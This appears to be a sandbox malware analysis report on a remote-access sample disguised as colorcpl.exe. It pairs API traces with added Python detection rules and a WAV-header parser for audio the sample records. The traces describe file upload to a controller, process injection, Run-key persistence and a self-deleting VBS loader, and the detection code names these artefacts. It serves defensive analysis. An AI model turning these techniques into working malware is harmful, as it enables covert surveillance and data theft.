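
```python
r"""Detection logic for the host artefacts visible in the traced functions:
%TEMP%\install.vbs or %TEMP%\update.vbs run by wscript/cscript, a copy of
colorcpl.exe running outside System32/SysWOW64, a %TEMP% executable named by
GetTempFileNameW(prefix "temp_") + ".exe", and Run / Policies\Explorer\Run
values pointing into user-writable folders."""
import re

# GetTempFileNameW uses at most the first three prefix characters, so
# "temp_" yields tem<hex>.tmp; the sample then appends ".exe" (inferred).
TEMP_EXE = re.compile(r"\\temp\\tem[0-9a-f]{1,4}\.tmp\.exe$", re.I)
TEMP_VBS = re.compile(r"\\temp\\(install|update)\.vbs", re.I)
RUN_KEY = re.compile(
    r"\\software\\microsoft\\windows\\currentversion\\(policies\\explorer\\)?run\\", re.I)
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Folders a Run value should not normally point into (assumption; tune per estate).
USER_WRITABLE = ("\\temp\\", "\\users\\public\\")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev):
    """Return the rule names one event triggers (empty list when benign)."""
    hits = []
    if ev["type"] == "process":
        image = ev["image"].lower()
        if basename(image) in ("wscript.exe", "cscript.exe") and TEMP_VBS.search(ev["cmdline"]):
            hits.append("temp_vbs_launch")
        # a binary carrying a system-process name but living elsewhere
        if basename(image) == "colorcpl.exe" and not image.startswith(SYSTEM_DIRS):
            hits.append("colorcpl_outside_system_dir")
    elif ev["type"] == "file":
        if TEMP_EXE.search(ev["target"]):
            hits.append("gettempfilename_exe_drop")
    elif ev["type"] == "registry":
        data = ev["data"].lower()
        if RUN_KEY.search(ev["key"]) and any(d in data for d in USER_WRITABLE):
            hits.append("run_key_into_user_writable_dir")
    return hits


def evaluate(events):
    """(event id, rule) pairs for a batch of Sysmon-like events."""
    return [(ev["id"], rule) for ev in events for rule in check_event(ev)]


# Constructed sample telemetry (not taken from the report) in a Sysmon-like shape.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process",
     "image": r"C:\Users\Public\Libraries\colorcpl.exe",
     "cmdline": r"C:\Users\Public\Libraries\colorcpl.exe"},
    {"id": 2, "type": "process",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\v\AppData\Local\Temp\install.vbs"'},
    {"id": 3, "type": "file",
     "target": r"C:\Users\v\AppData\Local\Temp\tem1A2B.tmp.exe"},
    {"id": 4, "type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Update",
     "data": r"C:\Users\Public\Libraries\colorcpl.exe"},
    # benign controls: the real colorcpl.exe and a logon script outside %TEMP%
    {"id": 5, "type": "process",
     "image": r"C:\Windows\System32\colorcpl.exe",
     "cmdline": r"C:\Windows\System32\colorcpl.exe"},
    {"id": 6, "type": "process",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" C:\Scripts\logon.vbs'},
]

if __name__ == "__main__":
    for event_id, rule in evaluate(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

The `colorcpl_outside_system_dir` rule is the cheapest of the four to deploy and the hardest for the loader to avoid, since the copied binary keeps its original name; the `temp_vbs_launch` rule should be paired with a retention policy for `%TEMP%\*.vbs`, because the script deletes itself (`fso.DeleteFile(Wscript.ScriptFullName)`) as soon as the loop around `fso.FileExists` finishes.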
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 04A81AB9
                                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 04A81AE3
                                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 04A81AF3
                                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 04A81B03
                                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 04A81B13
                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 04A81B23
                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 04A81B34
                                        • WriteFile.KERNEL32(00000000,04AEFA9A,00000002,00000000,00000000), ref: 04A81B45
                                        • WriteFile.KERNEL32(00000000,04AEFA9C,00000004,00000000,00000000), ref: 04A81B55
                                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 04A81B65
                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 04A81B76
                                        • WriteFile.KERNEL32(00000000,04AEFAA6,00000002,00000000,00000000), ref: 04A81B87
                                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 04A81B97
                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 04A81BA7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Write$Create
                                        • String ID: RIFF$WAVE$data$fmt
                                        • API String ID: 1602526932-4212202414
                                        • Opcode ID: 1346f98bc2ef3bb25f60de821ba0e7327cf305f6a106d2e44b3a3b4b7b30cca3
                                        • Instruction ID: 20a8c21e7f107a467e86b7c1ab47e6b3b69efd74a5764f57252dcdd4ee56ee15
                                        • Opcode Fuzzy Hash: 1346f98bc2ef3bb25f60de821ba0e7327cf305f6a106d2e44b3a3b4b7b30cca3
                                        • Instruction Fuzzy Hash: 06412A726443197FE210DE52DD86FBB7EECEB89B50F40041AF644DA080D7A4E9099BB3
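The WriteFile sequence above emits a 44-byte RIFF/WAVE header one field at a time (`RIFF`, size, `WAVE`, `fmt `, chunk size, format tag, channels, sample rate, byte rate, block align, bits per sample, `data`, data size); the values behind the `?` and pointer arguments are not resolved in the trace, so the format tag, sample rate and bit depth the sample actually uses are unknown here. The following Python is an added example, not part of the Joe Sandbox report or of the sample's code: it parses that header layout from a captured `.wav` and reports internal inconsistencies (a data size that does not match the bytes on disk, as with a recording cut off mid-write, or a byte rate that contradicts the other fields), which is what an analyst needs when triaging audio files the sample leaves behind. `build_wav_header` only constructs test input; its PCM, 8 kHz, mono, 16-bit defaults are assumptions.

```python
"""Parse the canonical 44-byte RIFF/WAVE header whose field order matches the
traced WriteFile sequence and flag headers that are inconsistent or truncated."""
import struct

HEADER_LEN = 44  # 12-byte RIFF header + 24-byte fmt chunk + 8-byte data chunk header


def build_wav_header(data_len, channels=1, sample_rate=8000, bits=16, fmt_tag=1):
    """Constructed header in the same field order as the traced writes (PCM by default)."""
    block_align = channels * bits // 8
    byte_rate = sample_rate * block_align
    return (b"RIFF" + struct.pack("<I", 36 + data_len) + b"WAVE"
            + b"fmt " + struct.pack("<IHHIIHH", 16, fmt_tag, channels,
                                    sample_rate, byte_rate, block_align, bits)
            + b"data" + struct.pack("<I", data_len))


def parse_wav_header(blob):
    """Return (fields, problems); problems is empty for a consistent, complete file."""
    if len(blob) < HEADER_LEN:
        raise ValueError("shorter than a canonical 44-byte WAV header")
    riff, riff_size, wave = struct.unpack_from("<4sI4s", blob, 0)
    (fmt_id, fmt_size, fmt_tag, channels, rate,
     byte_rate, block_align, bits) = struct.unpack_from("<4sIHHIIHH", blob, 12)
    data_id, data_size = struct.unpack_from("<4sI", blob, 36)
    payload = len(blob) - HEADER_LEN

    problems = []
    if riff != b"RIFF" or wave != b"WAVE":
        problems.append("missing RIFF/WAVE magic")
    if fmt_id != b"fmt " or fmt_size != 16:
        problems.append("fmt chunk is not the 16-byte PCM layout")
    if data_id != b"data":
        problems.append("third chunk is not 'data'")
    if block_align != channels * bits // 8:
        problems.append("block_align != channels * bits / 8")
    if byte_rate != rate * block_align:
        problems.append("byte_rate != sample_rate * block_align")
    if riff_size != 36 + data_size:
        problems.append("RIFF size != 36 + data size")
    if data_size != payload:
        # typical of a capture that was still being written when it was collected
        problems.append(f"data chunk claims {data_size} bytes, file carries {payload}")

    fields = {
        "format_tag": fmt_tag, "channels": channels, "sample_rate": rate,
        "bits": bits, "data_size": data_size,
        # duration from the header's own numbers; None if byte_rate is zero
        "seconds": data_size / byte_rate if byte_rate else None,
    }
    return fields, problems


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as fh:
        fields, problems = parse_wav_header(fh.read())
    print(fields)
    for p in problems:
        print("WARNING:", p)
```

When the header is consistent, `seconds` gives the recording length without decoding the audio; when `data_size` exceeds the bytes on disk, the trailing samples are still usable up to `payload`, since PCM carries no framing, so the file should be kept rather than discarded as corrupt.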
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$EnvironmentVariable$_wcschr
                                        • String ID:
                                        • API String ID: 3899193279-0
                                        • Opcode ID: b98985fe9ee6ab3a1d1b27ba8c1400378970f5037413ed8c9f329dcc80550646
                                        • Instruction ID: 2fb8cc59d1098dc21fcaf9ccd91e74110757f5bb127935587a07b60b51d2de76
                                        • Opcode Fuzzy Hash: b98985fe9ee6ab3a1d1b27ba8c1400378970f5037413ed8c9f329dcc80550646
                                        • Instruction Fuzzy Hash: 40D15971D053047FEF61AF788A44A6E7BA8EF01334F05816DED5A9B281FB39B8018750
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID: xF$xF
                                        • API String ID: 269201875-3476023522
                                        • Opcode ID: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                        • Instruction ID: c6d42cc1d2b776f159aae3ff29d20e663072dbbceae223ad74cd9c4ee772159c
                                        • Opcode Fuzzy Hash: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                        • Instruction Fuzzy Hash: 91C15276D4020DAFEBA0DBA8CC41FEAB7F8AF48714F244165FA14FB685D6709D4087A4
                                        APIs
                                        • _free.LIBCMT ref: 0691F2A4
                                        • ___free_lconv_mon.LIBCMT ref: 0691F2AF
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E4C4
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E4D6
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E4E8
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E4FA
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E50C
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E51E
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E530
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E542
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E554
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E566
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E578
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E58A
                                          • Part of subcall function 0691E4A7: _free.LIBCMT ref: 0691E59C
                                        • _free.LIBCMT ref: 0691F2C6
                                        • _free.LIBCMT ref: 0691F2DB
                                        • _free.LIBCMT ref: 0691F2E6
                                        • _free.LIBCMT ref: 0691F308
                                        • _free.LIBCMT ref: 0691F31B
                                        • _free.LIBCMT ref: 0691F329
                                        • _free.LIBCMT ref: 0691F334
                                        • _free.LIBCMT ref: 0691F36C
                                        • _free.LIBCMT ref: 0691F373
                                        • _free.LIBCMT ref: 0691F390
                                        • _free.LIBCMT ref: 0691F3A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$___free_lconv_mon
                                        • String ID: xF
                                        • API String ID: 3658870901-2169143296
                                        • Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                        • Instruction ID: 9fc09d69a17113c759b103fc4e919d6ea7f369340ee797fd3bc39e3c20d97539
                                        • Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                        • Instruction Fuzzy Hash: 45319E75A0020D9FEBE0EB79DD44B5A77E8AF44760F31492AE478EF950DB30A842CB15
                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 04A9382B
                                        • LoadLibraryA.KERNEL32(?), ref: 04A9386D
                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 04A9388D
                                        • FreeLibrary.KERNEL32(00000000), ref: 04A93894
                                        • LoadLibraryA.KERNEL32(?), ref: 04A938CC
                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 04A938DE
                                        • FreeLibrary.KERNEL32(00000000), ref: 04A938E5
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 04A938F4
                                        • FreeLibrary.KERNEL32(00000000), ref: 04A9390B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                        • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                        • API String ID: 2490988753-744132762
                                        • Opcode ID: 5b06c34f270be4842670f316639e5cabb174f05cd67278ae1296f30b3a19653d
                                        • Instruction ID: 24ef0a6f255daecc6e114a83bf7fabed96837d4c292894668a5a08f1680f9e81
                                        • Opcode Fuzzy Hash: 5b06c34f270be4842670f316639e5cabb174f05cd67278ae1296f30b3a19653d
                                        • Instruction Fuzzy Hash: 3831C2B2802311ABDF20AF65D8489DFBBFCEF49754F000618E89597200D739ED058BA2
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 04A9A43B
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 04A9A47F
                                        • RegCloseKey.ADVAPI32(?), ref: 04A9A749
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                        • API String ID: 1332880857-3714951968
                                        • Opcode ID: 7b5ff0a8ad4bfda3a73a6f25a7de2b346af4e593d891be46aedcc5821cb536c3
                                        • Instruction ID: 7cfb5379ac9810eef505092be1a30af372ac72210585c5f75bfb1186391a69b0
                                        • Opcode Fuzzy Hash: 7b5ff0a8ad4bfda3a73a6f25a7de2b346af4e593d891be46aedcc5821cb536c3
                                        • Instruction Fuzzy Hash: 668100711083859BE724FB51D950EFFB7E8EF94308F50492EE59A82190EF30B94ACB56
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$_wcschr
                                        • String ID:
                                        • API String ID: 565560161-0
                                        • Opcode ID: 8f8f6bf8198f661361f87136ecb7ebf93a417bae196628050410ce4dfb3fc85f
                                        • Instruction ID: 2a79c559cacf504457d75bc49dae07911f7b02562205f67737d4fb2af3d9d4ed
                                        • Opcode Fuzzy Hash: 8f8f6bf8198f661361f87136ecb7ebf93a417bae196628050410ce4dfb3fc85f
                                        • Instruction Fuzzy Hash: 50D128B1D0030C6FEBA0EF749C8066A7BE8AF05760F35417EE9659FAC4EA319508C795
                                        APIs
                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 04A9B38F
                                        • GetCursorPos.USER32(?), ref: 04A9B39E
                                        • SetForegroundWindow.USER32(?), ref: 04A9B3A7
                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 04A9B3C1
                                        • Shell_NotifyIconA.SHELL32(00000002,04AF1AE0), ref: 04A9B412
                                        • ExitProcess.KERNEL32 ref: 04A9B41A
                                        • CreatePopupMenu.USER32 ref: 04A9B420
                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 04A9B435
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                        • String ID: Close
                                        • API String ID: 1657328048-3535843008
                                        • Opcode ID: 68b07473d2b90d619cf0ac12578fd49618c10d855daad5a9bab1eb360ef86dda
                                        • Instruction ID: 3cabfb5b2f496a503a79ee2dac1ceae2428d7e2ecef07d36dff640c0ba96791e
                                        • Opcode Fuzzy Hash: 68b07473d2b90d619cf0ac12578fd49618c10d855daad5a9bab1eb360ef86dda
                                        • Instruction Fuzzy Hash: D421C975111109FFDF099FA4FD0DAAA3FF5FB24701F444614F606954A0D77AAD22AB20
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$Info
                                        • String ID:
                                        • API String ID: 2509303402-0
                                        • Opcode ID: 4622bfe0db675041215c9274bc4cc98b887fbfbcaaa6d39e98af43a00a4d82d1
                                        • Instruction ID: 0d83e46e20e7a415c8c06549a90071d8649c88f503f118f6ec3d41865cb064f8
                                        • Opcode Fuzzy Hash: 4622bfe0db675041215c9274bc4cc98b887fbfbcaaa6d39e98af43a00a4d82d1
                                        • Instruction Fuzzy Hash: 33B1A171904309AFEF51DFA8C984BEEBBF4FF08304F14816DE999A7241DB75A8458B60
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 2f053ac60eb79ec191c053a7fddcedd63e35585dd27580e6f5fea4236b9889f4
                                        • Instruction ID: 100b53696b3c06a742df70c6914df0e563808acaab42442f101400d595d81223
                                        • Opcode Fuzzy Hash: 2f053ac60eb79ec191c053a7fddcedd63e35585dd27580e6f5fea4236b9889f4
                                        • Instruction Fuzzy Hash: F3B1A271D002099FDB91DF65CD80BEEBBF8BF48700F244429E9A5AF641D7759842CB60
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 04ACE4EA
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD6FF
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD711
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD723
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD735
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD747
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD759
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD76B
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD77D
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD78F
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD7A1
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD7B3
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD7C5
                                          • Part of subcall function 04ACD6E2: _free.LIBCMT ref: 04ACD7D7
                                        • _free.LIBCMT ref: 04ACE4DF
                                          • Part of subcall function 04AC3C92: HeapFree.KERNEL32(00000000,00000000,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?), ref: 04AC3CA8
                                          • Part of subcall function 04AC3C92: GetLastError.KERNEL32(?,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?,?), ref: 04AC3CBA
                                        • _free.LIBCMT ref: 04ACE501
                                        • _free.LIBCMT ref: 04ACE516
                                        • _free.LIBCMT ref: 04ACE521
                                        • _free.LIBCMT ref: 04ACE543
                                        • _free.LIBCMT ref: 04ACE556
                                        • _free.LIBCMT ref: 04ACE564
                                        • _free.LIBCMT ref: 04ACE56F
                                        • _free.LIBCMT ref: 04ACE5A7
                                        • _free.LIBCMT ref: 04ACE5AE
                                        • _free.LIBCMT ref: 04ACE5CB
                                        • _free.LIBCMT ref: 04ACE5E3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID:
                                        • API String ID: 161543041-0
                                        • Opcode ID: 41c979ee838667a1ab904165c7c8012ccd1c603d80f7618d3b6cca96293c13c4
                                        • Instruction ID: b4a4f595ba20e3ddc78d608186175dd3b8862ad4542c3cdb598845444374d78f
                                        • Opcode Fuzzy Hash: 41c979ee838667a1ab904165c7c8012ccd1c603d80f7618d3b6cca96293c13c4
                                        • Instruction Fuzzy Hash: 37316D716043089FFFA0AB38DA48B5B73E8AF04324F55C42DE499D7150EE35F9548B10
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 04A87D1F
                                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 04A87D57
                                        • __aulldiv.LIBCMT ref: 04A87D89
                                          • Part of subcall function 04A84A81: send.WS2_32(?,00000000,00000000,00000000), ref: 04A84B16
                                          • Part of subcall function 04A994DA: GetLocalTime.KERNEL32(00000000), ref: 04A994F4
                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 04A87EAC
                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 04A87EC7
                                        • CloseHandle.KERNEL32(00000000), ref: 04A87FA0
                                        • CloseHandle.KERNEL32(00000000,00000052), ref: 04A87FEA
                                        • CloseHandle.KERNEL32(00000000), ref: 04A88038
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                        • API String ID: 3086580692-2596673759
                                        • Opcode ID: 987d5e5f4bd76b2fc2a594ffdfd2d8c48bef3cf56bfdf18ec59c75ea2df5c73f
                                        • Instruction ID: bc67ca748f5f95fdfc16e9231999bd74bdfad8689b2e2748916ea1242412e2d1
                                        • Opcode Fuzzy Hash: 987d5e5f4bd76b2fc2a594ffdfd2d8c48bef3cf56bfdf18ec59c75ea2df5c73f
                                        • Instruction Fuzzy Hash: E0B1B0716083409BE714FB64C990ABFB7E9EFD4218F504A1DF48A46290EF31AD06CB56
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,04AF2248,04AF1FFC,?,00000001), ref: 04A8DE4E
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 04A8DE79
                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 04A8DE95
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 04A8DF14
                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 04A8DF23
                                          • Part of subcall function 04A99F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 04A99F9C
                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 04A8E047
                                        • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 04A8E133
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                        • API String ID: 193334293-1743721670
                                        • Opcode ID: b016539f5566d2fd19a85fd29291e8276540a535cdaa8a5f63a483ceee4c67f9
                                        • Instruction ID: 40dcf3b622e78a0b3b7da1e81b35d410d5c246344ef7d57af1b0c01ef56ebcf1
                                        • Opcode Fuzzy Hash: b016539f5566d2fd19a85fd29291e8276540a535cdaa8a5f63a483ceee4c67f9
                                        • Instruction Fuzzy Hash: 388150715093419BEB14FBA0D990DAFB7E9EFA4248F40082DE58687191EF34BD4ECB52
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: b91f6b7c43b4527f54a3435074a7d188840fd85cbdbfea5bcdd858e5b83b1841
                                        • Instruction ID: 1c6f2a121b97c3ceb346281b9db924adf104b73bc16504862f8f7568d49d0983
                                        • Opcode Fuzzy Hash: b91f6b7c43b4527f54a3435074a7d188840fd85cbdbfea5bcdd858e5b83b1841
                                        • Instruction Fuzzy Hash: EBC18772E44204BFEB60DBA8CD45FEE77F8AB48708F054169FA49FB281D670B9458750
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 04A918B2
                                          • Part of subcall function 04A99959: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,04AE9654,04A8BDCB,.vbs,?,?,?,?,?,04AF2200), ref: 04A99980
                                          • Part of subcall function 04A968A6: CloseHandle.KERNEL32(04A840D5,?,?,04A840D5,04AE2E24), ref: 04A968BC
                                          • Part of subcall function 04A968A6: CloseHandle.KERNEL32(04AE2E24,?,?,04A840D5,04AE2E24), ref: 04A968C5
                                        • Sleep.KERNEL32(0000000A,04AE2E24), ref: 04A91A01
                                        • Sleep.KERNEL32(0000000A,04AE2E24,04AE2E24), ref: 04A91AA3
                                        • Sleep.KERNEL32(0000000A,04AE2E24,04AE2E24,04AE2E24), ref: 04A91B42
                                        • DeleteFileW.KERNEL32(00000000,04AE2E24,04AE2E24,04AE2E24), ref: 04A91B9F
                                        • DeleteFileW.KERNEL32(00000000,04AE2E24,04AE2E24,04AE2E24), ref: 04A91BCF
                                        • DeleteFileW.KERNEL32(00000000,04AE2E24,04AE2E24,04AE2E24), ref: 04A91C05
                                        • Sleep.KERNEL32(000001F4,04AE2E24,04AE2E24,04AE2E24), ref: 04A91C25
                                        • Sleep.KERNEL32(00000064), ref: 04A91C63
                                          • Part of subcall function 04A84A81: send.WS2_32(?,00000000,00000000,00000000), ref: 04A84B16
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                        • String ID: /stext "
                                        • API String ID: 1223786279-3856184850
                                        • Opcode ID: 3d94059923e31c6ff1190a398cab537a6962476fd4acee07f52b7e73c56378c0
                                        • Instruction ID: b7a4c1225182c0aeaf92571f8066c227251bd031ea31a71cb93f2af28f12bb83
                                        • Opcode Fuzzy Hash: 3d94059923e31c6ff1190a398cab537a6962476fd4acee07f52b7e73c56378c0
